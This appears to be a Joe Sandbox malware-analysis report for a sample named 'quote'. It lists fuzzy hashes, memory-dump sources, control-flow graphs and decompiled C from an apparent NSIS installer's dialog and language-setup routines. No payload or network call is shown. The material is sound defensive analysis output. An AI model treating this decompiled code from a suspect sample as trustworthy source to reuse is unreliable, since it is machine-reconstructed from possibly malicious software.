                                                                                      • Opcode Fuzzy Hash: d15d9f8b94c718e8b996935edec89f2fa51c127c1f6ce4ab43e358fb3bcaf991
                                                                                      • Instruction Fuzzy Hash: E491FF31605354CFDF349F29C9A97EA77B2FF56350F59802ADC8A9B205D3309A81CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateCreateFileMemoryVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2773895085-0
                                                                                      • Opcode ID: fd9ea33370fbce073a5ef23250c6e3d41601fd44c12f56a032069afc8bfec03a
                                                                                      • Instruction ID: aa1fae045a94daa7aa6c127211b83a2440b906e3c2aed34cc39aa7a8cc5dc176
                                                                                      • Opcode Fuzzy Hash: fd9ea33370fbce073a5ef23250c6e3d41601fd44c12f56a032069afc8bfec03a
                                                                                      • Instruction Fuzzy Hash: 23514436604395DFCB24AF7988A83EE77E2AF96750F15812EDC8A9B301D7308A41CB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 283619485f1ba4527ff5cfcd67d76d161ab9e89535a43867515b8561e7c5071c
                                                                                      • Instruction ID: ebfcec0a592cb7b2387e89c276bddf21483bf777447c7d70047d2293faf06982
                                                                                      • Opcode Fuzzy Hash: 283619485f1ba4527ff5cfcd67d76d161ab9e89535a43867515b8561e7c5071c
                                                                                      • Instruction Fuzzy Hash: 1A31F036A04368DFDB249F65CC697EA77B2BF55710F05402DDC8AAB300D7315A41CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 190 403e8e-403ea0 191 403fe1-403ff0 190->191 192 403ea6-403eac 190->192 194 403ff2-40402d GetDlgItem * 2 call 404367 KiUserCallbackDispatcher call 40140b 191->194 195 40403f-404054 191->195 192->191 193 403eb2-403ebb 192->193 196 403ed0-403ed3 193->196 197 403ebd-403eca SetWindowPos 193->197 217 404032-40403a 194->217 199 404094-404099 call 4043b3 195->199 200 404056-404059 195->200 202 403ed5-403ee7 ShowWindow 196->202 203 403eed-403ef3 196->203 197->196 208 40409e-4040b9 199->208 205 40405b-404066 call 401389 200->205 206 40408c-40408e 200->206 202->203 209 403ef5-403f0a DestroyWindow 203->209 210 403f0f-403f12 203->210 205->206 227 404068-404087 SendMessageW 205->227 206->199 207 404334 206->207 215 404336-40433d 207->215 213 4040c2-4040c8 208->213 214 4040bb-4040bd call 40140b 208->214 216 404311-404317 209->216 218 403f14-403f20 SetWindowLongW 210->218 219 403f25-403f2b 210->219 223 4042f2-40430b DestroyWindow EndDialog 213->223 224 4040ce-4040d9 213->224 214->213 216->207 222 404319-40431f 216->222 217->195 218->215 225 403f31-403f42 GetDlgItem 219->225 226 403fce-403fdc call 4043ce 219->226 222->207 229 404321-40432a ShowWindow 222->229 223->216 224->223 230 4040df-40412c call 40644e call 404367 * 3 GetDlgItem 224->230 231 403f61-403f64 225->231 232 403f44-403f5b SendMessageW IsWindowEnabled 225->232 226->215 227->215 229->207 260 404136-404172 ShowWindow KiUserCallbackDispatcher call 404389 EnableWindow 230->260 261 40412e-404133 230->261 235 403f66-403f67 231->235 236 403f69-403f6c 231->236 232->207 232->231 237 403f97-403f9c call 404340 235->237 238 403f7a-403f7f 236->238 239 403f6e-403f74 236->239 237->226 241 403fb5-403fc8 SendMessageW 238->241 243 403f81-403f87 238->243 239->241 242 403f76-403f78 239->242 241->226 242->237 246 403f89-403f8f call 40140b 243->246 247 403f9e-403fa7 call 40140b 243->247 256 403f95 246->256 247->226 257 403fa9-403fb3 247->257 256->237 257->256 264 404174-404175 260->264 265 404177 260->265 261->260 266 404179-4041a7 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 4041a9-4041ba SendMessageW 266->267 268 4041bc 266->268 269 4041c2-404201 call 40439c call 403e6f call 406411 lstrlenW call 40644e SetWindowTextW call 401389 267->269 268->269 269->208 280 404207-404209 269->280 280->208 281 40420f-404213 280->281 282 404232-404246 DestroyWindow 281->282 283 404215-40421b 281->283 282->216 285 40424c-404279 CreateDialogParamW 282->285 283->207 284 404221-404227 283->284 284->208 286 40422d 284->286 285->216 287 40427f-4042d6 call 404367 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->207 287->207 292 4042d8-4042eb ShowWindow call 4043b3 287->292 294 4042f0 292->294 294->216
                                                                                      C-Code - Quality: 84%
                                                                                      			E00403E8E(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                      				struct HWND__* _v32;
                                                                                      				void* _v84;
                                                                                      				void* _v88;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t37;
                                                                                      				signed int _t39;
                                                                                      				signed int _t41;
                                                                                      				struct HWND__* _t51;
                                                                                      				signed int _t70;
                                                                                      				struct HWND__* _t76;
                                                                                      				signed int _t89;
                                                                                      				struct HWND__* _t94;
                                                                                      				signed int _t102;
                                                                                      				int _t106;
                                                                                      				signed int _t118;
                                                                                      				signed int _t119;
                                                                                      				int _t120;
                                                                                      				signed int _t125;
                                                                                      				struct HWND__* _t128;
                                                                                      				struct HWND__* _t129;
                                                                                      				int _t130;
                                                                                      				long _t133;
                                                                                      				int _t135;
                                                                                      				int _t136;
                                                                                      				void* _t137;
                                                                                      				void* _t145;
                                                                                      
                                                                                      				_t118 = _a8;
                                                                                      				if(_t118 == 0x110 || _t118 == 0x408) {
                                                                                      					_t37 = _a12;
                                                                                      					_t128 = _a4;
                                                                                      					__eflags = _t118 - 0x110;
                                                                                      					 *0x42d250 = _t37;
                                                                                      					if(_t118 == 0x110) {
                                                                                      						 *0x434f08 = _t128;
                                                                                      						 *0x42d264 = GetDlgItem(_t128, 1);
                                                                                      						_t94 = GetDlgItem(_t128, 2);
                                                                                      						_push(0xffffffff);
                                                                                      						_push(0x1c);
                                                                                      						 *0x42b230 = _t94;
                                                                                      						E00404367(_t128);
                                                                                      						SetClassLongW(_t128, 0xfffffff2,  *0x433ee8); // executed
                                                                                      						 *0x433ecc = E0040140B(4);
                                                                                      						_t37 = 1;
                                                                                      						__eflags = 1;
                                                                                      						 *0x42d250 = 1;
                                                                                      					}
                                                                                      					_t125 =  *0x40a368; // 0x0
                                                                                      					_t136 = 0;
                                                                                      					_t133 = (_t125 << 6) +  *0x434f40;
                                                                                      					__eflags = _t125;
                                                                                      					if(_t125 < 0) {
                                                                                      						L34:
                                                                                      						E004043B3(0x40b);
                                                                                      						while(1) {
                                                                                      							_t39 =  *0x42d250;
                                                                                      							 *0x40a368 =  *0x40a368 + _t39;
                                                                                      							_t133 = _t133 + (_t39 << 6);
                                                                                      							_t41 =  *0x40a368; // 0x0
                                                                                      							__eflags = _t41 -  *0x434f44;
                                                                                      							if(_t41 ==  *0x434f44) {
                                                                                      								E0040140B(1);
                                                                                      							}
                                                                                      							__eflags =  *0x433ecc - _t136; // 0x0
                                                                                      							if(__eflags != 0) {
                                                                                      								break;
                                                                                      							}
                                                                                      							__eflags =  *0x40a368 -  *0x434f44; // 0x0
                                                                                      							if(__eflags >= 0) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t119 =  *(_t133 + 0x14);
                                                                                      							E0040644E(_t119, _t128, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                      							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                      							_push(0xfffffc19);
                                                                                      							E00404367(_t128);
                                                                                      							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                      							_push(0xfffffc1b);
                                                                                      							E00404367(_t128);
                                                                                      							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                      							_push(0xfffffc1a);
                                                                                      							E00404367(_t128);
                                                                                      							_t51 = GetDlgItem(_t128, 3);
                                                                                      							__eflags =  *0x434fac - _t136;
                                                                                      							_v32 = _t51;
                                                                                      							if( *0x434fac != _t136) {
                                                                                      								_t119 = _t119 & 0x0000fefd | 0x00000004;
                                                                                      								__eflags = _t119;
                                                                                      							}
                                                                                      							ShowWindow(_t51, _t119 & 0x00000008); // executed
                                                                                      							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
                                                                                      							E00404389(_t119 & 0x00000002);
                                                                                      							_t120 = _t119 & 0x00000004;
                                                                                      							EnableWindow( *0x42b230, _t120);
                                                                                      							__eflags = _t120 - _t136;
                                                                                      							if(_t120 == _t136) {
                                                                                      								_push(1);
                                                                                      							} else {
                                                                                      								_push(_t136);
                                                                                      							}
                                                                                      							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
                                                                                      							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
                                                                                      							__eflags =  *0x434fac - _t136;
                                                                                      							if( *0x434fac == _t136) {
                                                                                      								_push( *0x42d264);
                                                                                      							} else {
                                                                                      								SendMessageW(_t128, 0x401, 2, _t136);
                                                                                      								_push( *0x42b230);
                                                                                      							}
                                                                                      							E0040439C();
                                                                                      							E00406411(0x42d268, E00403E6F());
                                                                                      							E0040644E(0x42d268, _t128, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                      							SetWindowTextW(_t128, 0x42d268); // executed
                                                                                      							_push(_t136);
                                                                                      							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                                      							__eflags = _t70;
                                                                                      							if(_t70 != 0) {
                                                                                      								continue;
                                                                                      							} else {
                                                                                      								__eflags =  *_t133 - _t136;
                                                                                      								if( *_t133 == _t136) {
                                                                                      									continue;
                                                                                      								}
                                                                                      								__eflags =  *(_t133 + 4) - 5;
                                                                                      								if( *(_t133 + 4) != 5) {
                                                                                      									DestroyWindow( *0x433ed8); // executed
                                                                                      									 *0x42c240 = _t133;
                                                                                      									__eflags =  *_t133 - _t136;
                                                                                      									if( *_t133 <= _t136) {
                                                                                      										goto L58;
                                                                                      									}
                                                                                      									_t76 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t128,  *( *(_t133 + 4) * 4 + "&E@"), _t133); // executed
                                                                                      									__eflags = _t76 - _t136;
                                                                                      									 *0x433ed8 = _t76;
                                                                                      									if(_t76 == _t136) {
                                                                                      										goto L58;
                                                                                      									}
                                                                                      									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                      									_push(6);
                                                                                      									E00404367(_t76);
                                                                                      									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
                                                                                      									ScreenToClient(_t128, _t137 + 0x10);
                                                                                      									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                      									_push(_t136);
                                                                                      									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                                      									__eflags =  *0x433ecc - _t136; // 0x0
                                                                                      									if(__eflags != 0) {
                                                                                      										goto L61;
                                                                                      									}
                                                                                      									ShowWindow( *0x433ed8, 8); // executed
                                                                                      									E004043B3(0x405);
                                                                                      									goto L58;
                                                                                      								}
                                                                                      								__eflags =  *0x434fac - _t136;
                                                                                      								if( *0x434fac != _t136) {
                                                                                      									goto L61;
                                                                                      								}
                                                                                      								__eflags =  *0x434fa0 - _t136;
                                                                                      								if( *0x434fa0 != _t136) {
                                                                                      									continue;
                                                                                      								}
                                                                                      								goto L61;
                                                                                      							}
                                                                                      						}
                                                                                      						DestroyWindow( *0x433ed8);
                                                                                      						 *0x434f08 = _t136;
                                                                                      						EndDialog(_t128,  *0x42ba38);
                                                                                      						goto L58;
                                                                                      					} else {
                                                                                      						__eflags = _t37 - 1;
                                                                                      						if(_t37 != 1) {
                                                                                      							L33:
                                                                                      							__eflags =  *_t133 - _t136;
                                                                                      							if( *_t133 == _t136) {
                                                                                      								goto L61;
                                                                                      							}
                                                                                      							goto L34;
                                                                                      						}
                                                                                      						_push(0);
                                                                                      						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                                      						__eflags = _t89;
                                                                                      						if(_t89 == 0) {
                                                                                      							goto L33;
                                                                                      						}
                                                                                      						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                                                      						__eflags =  *0x433ecc - _t136; // 0x0
                                                                                      						return 0 | __eflags == 0x00000000;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t128 = _a4;
                                                                                      					_t136 = 0;
                                                                                      					if(_t118 == 0x47) {
                                                                                      						SetWindowPos( *0x42d248, _t128, 0, 0, 0, 0, 0x13);
                                                                                      					}
                                                                                      					if(_t118 == 5) {
                                                                                      						asm("sbb eax, eax");
                                                                                      						ShowWindow( *0x42d248,  ~(_a12 - 1) & _t118);
                                                                                      					}
                                                                                      					if(_t118 != 0x40d) {
                                                                                      						__eflags = _t118 - 0x11;
                                                                                      						if(_t118 != 0x11) {
                                                                                      							__eflags = _t118 - 0x111;
                                                                                      							if(_t118 != 0x111) {
                                                                                      								L26:
                                                                                      								return E004043CE(_t118, _a12, _a16);
                                                                                      							}
                                                                                      							_t135 = _a12 & 0x0000ffff;
                                                                                      							_t129 = GetDlgItem(_t128, _t135);
                                                                                      							__eflags = _t129 - _t136;
                                                                                      							if(_t129 == _t136) {
                                                                                      								L13:
                                                                                      								__eflags = _t135 - 1;
                                                                                      								if(_t135 != 1) {
                                                                                      									__eflags = _t135 - 3;
                                                                                      									if(_t135 != 3) {
                                                                                      										_t130 = 2;
                                                                                      										__eflags = _t135 - _t130;
                                                                                      										if(_t135 != _t130) {
                                                                                      											L25:
                                                                                      											SendMessageW( *0x433ed8, 0x111, _a12, _a16);
                                                                                      											goto L26;
                                                                                      										}
                                                                                      										__eflags =  *0x434fac - _t136;
                                                                                      										if( *0x434fac == _t136) {
                                                                                      											_t102 = E0040140B(3);
                                                                                      											__eflags = _t102;
                                                                                      											if(_t102 != 0) {
                                                                                      												goto L26;
                                                                                      											}
                                                                                      											 *0x42ba38 = 1;
                                                                                      											L21:
                                                                                      											_push(0x78);
                                                                                      											L22:
                                                                                      											E00404340();
                                                                                      											goto L26;
                                                                                      										}
                                                                                      										E0040140B(_t130);
                                                                                      										 *0x42ba38 = _t130;
                                                                                      										goto L21;
                                                                                      									}
                                                                                      									__eflags =  *0x40a368 - _t136; // 0x0
                                                                                      									if(__eflags <= 0) {
                                                                                      										goto L25;
                                                                                      									}
                                                                                      									_push(0xffffffff);
                                                                                      									goto L22;
                                                                                      								}
                                                                                      								_push(_t135);
                                                                                      								goto L22;
                                                                                      							}
                                                                                      							SendMessageW(_t129, 0xf3, _t136, _t136);
                                                                                      							_t106 = IsWindowEnabled(_t129);
                                                                                      							__eflags = _t106;
                                                                                      							if(_t106 == 0) {
                                                                                      								goto L61;
                                                                                      							}
                                                                                      							goto L13;
                                                                                      						}
                                                                                      						SetWindowLongW(_t128, _t136, _t136);
                                                                                      						return 1;
                                                                                      					} else {
                                                                                      						DestroyWindow( *0x433ed8);
                                                                                      						 *0x433ed8 = _a12;
                                                                                      						L58:
                                                                                      						if( *0x42f268 == _t136) {
                                                                                      							_t145 =  *0x433ed8 - _t136; // 0x10446
                                                                                      							if(_t145 != 0) {
                                                                                      								ShowWindow(_t128, 0xa); // executed
                                                                                      								 *0x42f268 = 1;
                                                                                      							}
                                                                                      						}
                                                                                      						L61:
                                                                                      						return 0;
                                                                                      					}
                                                                                      				}
                                                                                      			}































                                                                                      0x00403e97
                                                                                      0x00403ea0
                                                                                      0x00403fe1
                                                                                      0x00403fe5
                                                                                      0x00403fe9
                                                                                      0x00403feb
                                                                                      0x00403ff0
                                                                                      0x00403ffb
                                                                                      0x00404006
                                                                                      0x0040400b
                                                                                      0x0040400d
                                                                                      0x0040400f
                                                                                      0x00404012
                                                                                      0x00404017
                                                                                      0x00404025
                                                                                      0x00404032
                                                                                      0x00404039
                                                                                      0x00404039
                                                                                      0x0040403a
                                                                                      0x0040403a
                                                                                      0x0040403f
                                                                                      0x00404045
                                                                                      0x0040404c
                                                                                      0x00404052
                                                                                      0x00404054
                                                                                      0x00404094
                                                                                      0x00404099
                                                                                      0x0040409e
                                                                                      0x0040409e
                                                                                      0x004040a3
                                                                                      0x004040ac
                                                                                      0x004040ae
                                                                                      0x004040b3
                                                                                      0x004040b9
                                                                                      0x004040bd
                                                                                      0x004040bd
                                                                                      0x004040c2
                                                                                      0x004040c8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004040d3
                                                                                      0x004040d9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004040e2
                                                                                      0x004040ea
                                                                                      0x004040ef
                                                                                      0x004040f2
                                                                                      0x004040f8
                                                                                      0x004040fd
                                                                                      0x00404100
                                                                                      0x00404106
                                                                                      0x0040410b
                                                                                      0x0040410e
                                                                                      0x00404114
                                                                                      0x0040411c
                                                                                      0x00404122
                                                                                      0x00404128
                                                                                      0x0040412c
                                                                                      0x00404133
                                                                                      0x00404133
                                                                                      0x00404133
                                                                                      0x0040413d
                                                                                      0x0040414f
                                                                                      0x0040415b
                                                                                      0x00404160
                                                                                      0x0040416a
                                                                                      0x00404170
                                                                                      0x00404172
                                                                                      0x00404177
                                                                                      0x00404174
                                                                                      0x00404174
                                                                                      0x00404174
                                                                                      0x00404187
                                                                                      0x0040419f
                                                                                      0x004041a1
                                                                                      0x004041a7
                                                                                      0x004041bc
                                                                                      0x004041a9
                                                                                      0x004041b2
                                                                                      0x004041b4
                                                                                      0x004041b4
                                                                                      0x004041c2
                                                                                      0x004041d3
                                                                                      0x004041e9
                                                                                      0x004041f0
                                                                                      0x004041f6
                                                                                      0x004041fa
                                                                                      0x004041ff
                                                                                      0x00404201
                                                                                      0x00000000
                                                                                      0x00404207
                                                                                      0x00404207
                                                                                      0x00404209
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040420f
                                                                                      0x00404213
                                                                                      0x00404238
                                                                                      0x0040423e
                                                                                      0x00404244
                                                                                      0x00404246
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040426c
                                                                                      0x00404272
                                                                                      0x00404274
                                                                                      0x00404279
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040427f
                                                                                      0x00404282
                                                                                      0x00404285
                                                                                      0x0040429c
                                                                                      0x004042a8
                                                                                      0x004042c1
                                                                                      0x004042c7
                                                                                      0x004042cb
                                                                                      0x004042d0
                                                                                      0x004042d6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004042e0
                                                                                      0x004042eb
                                                                                      0x00000000
                                                                                      0x004042eb
                                                                                      0x00404215
                                                                                      0x0040421b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404221
                                                                                      0x00404227
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040422d
                                                                                      0x00404201
                                                                                      0x004042f8
                                                                                      0x00404304
                                                                                      0x0040430b
                                                                                      0x00000000
                                                                                      0x00404056
                                                                                      0x00404056
                                                                                      0x00404059
                                                                                      0x0040408c
                                                                                      0x0040408c
                                                                                      0x0040408e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040408e
                                                                                      0x0040405b
                                                                                      0x0040405f
                                                                                      0x00404064
                                                                                      0x00404066
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404076
                                                                                      0x0040407e
                                                                                      0x00000000
                                                                                      0x00404084
                                                                                      0x00403eb2
                                                                                      0x00403eb2
                                                                                      0x00403eb6
                                                                                      0x00403ebb
                                                                                      0x00403eca
                                                                                      0x00403eca
                                                                                      0x00403ed3
                                                                                      0x00403edc
                                                                                      0x00403ee7
                                                                                      0x00403ee7
                                                                                      0x00403ef3
                                                                                      0x00403f0f
                                                                                      0x00403f12
                                                                                      0x00403f25
                                                                                      0x00403f2b
                                                                                      0x00403fce
                                                                                      0x00000000
                                                                                      0x00403fd7
                                                                                      0x00403f31
                                                                                      0x00403f3e
                                                                                      0x00403f40
                                                                                      0x00403f42
                                                                                      0x00403f61
                                                                                      0x00403f61
                                                                                      0x00403f64
                                                                                      0x00403f69
                                                                                      0x00403f6c
                                                                                      0x00403f7c
                                                                                      0x00403f7d
                                                                                      0x00403f7f
                                                                                      0x00403fb5
                                                                                      0x00403fc8
                                                                                      0x00000000
                                                                                      0x00403fc8
                                                                                      0x00403f81
                                                                                      0x00403f87
                                                                                      0x00403fa0
                                                                                      0x00403fa5
                                                                                      0x00403fa7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403fa9
                                                                                      0x00403f95
                                                                                      0x00403f95
                                                                                      0x00403f97
                                                                                      0x00403f97
                                                                                      0x00000000
                                                                                      0x00403f97
                                                                                      0x00403f8a
                                                                                      0x00403f8f
                                                                                      0x00000000
                                                                                      0x00403f8f
                                                                                      0x00403f6e
                                                                                      0x00403f74
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403f76
                                                                                      0x00000000
                                                                                      0x00403f76
                                                                                      0x00403f66
                                                                                      0x00000000
                                                                                      0x00403f66
                                                                                      0x00403f4c
                                                                                      0x00403f53
                                                                                      0x00403f59
                                                                                      0x00403f5b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403f5b
                                                                                      0x00403f17
                                                                                      0x00000000
                                                                                      0x00403ef5
                                                                                      0x00403efb
                                                                                      0x00403f05
                                                                                      0x00404311
                                                                                      0x00404317
                                                                                      0x00404319
                                                                                      0x0040431f
                                                                                      0x00404324
                                                                                      0x0040432a
                                                                                      0x0040432a
                                                                                      0x0040431f
                                                                                      0x00404334
                                                                                      0x00000000
                                                                                      0x00404334
                                                                                      0x00403ef3

                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403ECA
                                                                                      • ShowWindow.USER32(?), ref: 00403EE7
                                                                                      • DestroyWindow.USER32 ref: 00403EFB
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F17
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403F38
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F4C
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403F53
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00404001
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 0040400B
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404025
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404076
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 0040411C
                                                                                      • ShowWindow.USER32(00000000,?), ref: 0040413D
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040414F
                                                                                      • EnableWindow.USER32(?,?), ref: 0040416A
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404180
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00404187
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040419F
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041B2
                                                                                      • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 004041DC
                                                                                      • SetWindowTextW.USER32(?,0042D268), ref: 004041F0
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404324
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3906175533-0
                                                                                      • Opcode ID: 9f4b89b181f7ea2427412b6a5e1e41d5f9313a160c091d4bdffc9bb879b1fb5a
                                                                                      • Instruction ID: cb6f0490afd218b95da4ce8f8645ed9f2a2dc6dad26b5163c80864a666f03042
                                                                                      • Opcode Fuzzy Hash: 9f4b89b181f7ea2427412b6a5e1e41d5f9313a160c091d4bdffc9bb879b1fb5a
                                                                                      • Instruction Fuzzy Hash: 40C1AFB1600305EFDB206F61EE85E2B7A68FB85706B54053EFA81B11F0CB799841DB2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 295 403ae0-403af8 call 406806 298 403afa-403b05 GetUserDefaultUILanguage call 406358 295->298 299 403b0c-403b43 call 4062df 295->299 302 403b0a 298->302 305 403b45-403b56 call 4062df 299->305 306 403b5b-403b61 lstrcatW 299->306 304 403b66-403b8f call 403db6 call 405dee 302->304 312 403c21-403c29 call 405dee 304->312 313 403b95-403b9a 304->313 305->306 306->304 319 403c37-403c5c LoadImageW 312->319 320 403c2b-403c32 call 40644e 312->320 313->312 314 403ba0-403bc8 call 4062df 313->314 314->312 321 403bca-403bce 314->321 323 403cdd-403ce5 call 40140b 319->323 324 403c5e-403c8e RegisterClassW 319->324 320->319 325 403be0-403bec lstrlenW 321->325 326 403bd0-403bdd call 405d13 321->326 335 403ce7-403cea 323->335 336 403cef-403cfa call 403db6 323->336 327 403c94-403cd8 SystemParametersInfoW CreateWindowExW 324->327 328 403dac 324->328 332 403c14-403c1c call 405ce6 call 406411 325->332 333 403bee-403bfc lstrcmpiW 325->333 326->325 327->323 331 403dae-403db5 328->331 332->312 333->332 339 403bfe-403c08 GetFileAttributesW 333->339 335->331 347 403d00-403d1a ShowWindow call 406796 336->347 348 403d83-403d84 call 40554c 336->348 342 403c0a-403c0c 339->342 343 403c0e-403c0f call 405d32 339->343 342->332 342->343 343->332 355 403d26-403d38 GetClassInfoW 347->355 356 403d1c-403d21 call 406796 347->356 351 403d89-403d8b 348->351 353 403da5-403da7 call 40140b 351->353 354 403d8d-403d93 351->354 353->328 354->335 357 403d99-403da0 call 40140b 354->357 360 403d50-403d73 DialogBoxParamW call 40140b 355->360 361 403d3a-403d4a GetClassInfoW RegisterClassW 355->361 356->355 357->335 365 403d78-403d81 call 403a30 360->365 361->360 365->331
                                                                                      C-Code - Quality: 96%
                                                                                      			E00403AE0(void* __eflags) {
                                                                                      				intOrPtr _v4;
                                                                                      				intOrPtr _v8;
                                                                                      				int _v12;
                                                                                      				void _v16;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr* _t22;
                                                                                      				void* _t30;
                                                                                      				void* _t32;
                                                                                      				int _t33;
                                                                                      				void* _t36;
                                                                                      				int _t39;
                                                                                      				int _t40;
                                                                                      				intOrPtr _t41;
                                                                                      				int _t44;
                                                                                      				short _t63;
                                                                                      				WCHAR* _t65;
                                                                                      				signed char _t69;
                                                                                      				signed short _t73;
                                                                                      				WCHAR* _t76;
                                                                                      				intOrPtr _t82;
                                                                                      				WCHAR* _t87;
                                                                                      
                                                                                      				_t82 =  *0x434f14;
                                                                                      				_t22 = E00406806(2);
                                                                                      				_t90 = _t22;
                                                                                      				if(_t22 == 0) {
                                                                                      					_t76 = 0x42d268;
                                                                                      					L"1033" = 0x30;
                                                                                      					 *0x442002 = 0x78;
                                                                                      					 *0x442004 = 0;
                                                                                      					E004062DF(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                                                      					__eflags =  *0x42d268;
                                                                                      					if(__eflags == 0) {
                                                                                      						E004062DF(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                                                      					}
                                                                                      					lstrcatW(L"1033", _t76);
                                                                                      				} else {
                                                                                      					_t73 =  *_t22(); // executed
                                                                                      					E00406358(L"1033", _t73 & 0x0000ffff);
                                                                                      				}
                                                                                      				E00403DB6(_t78, _t90);
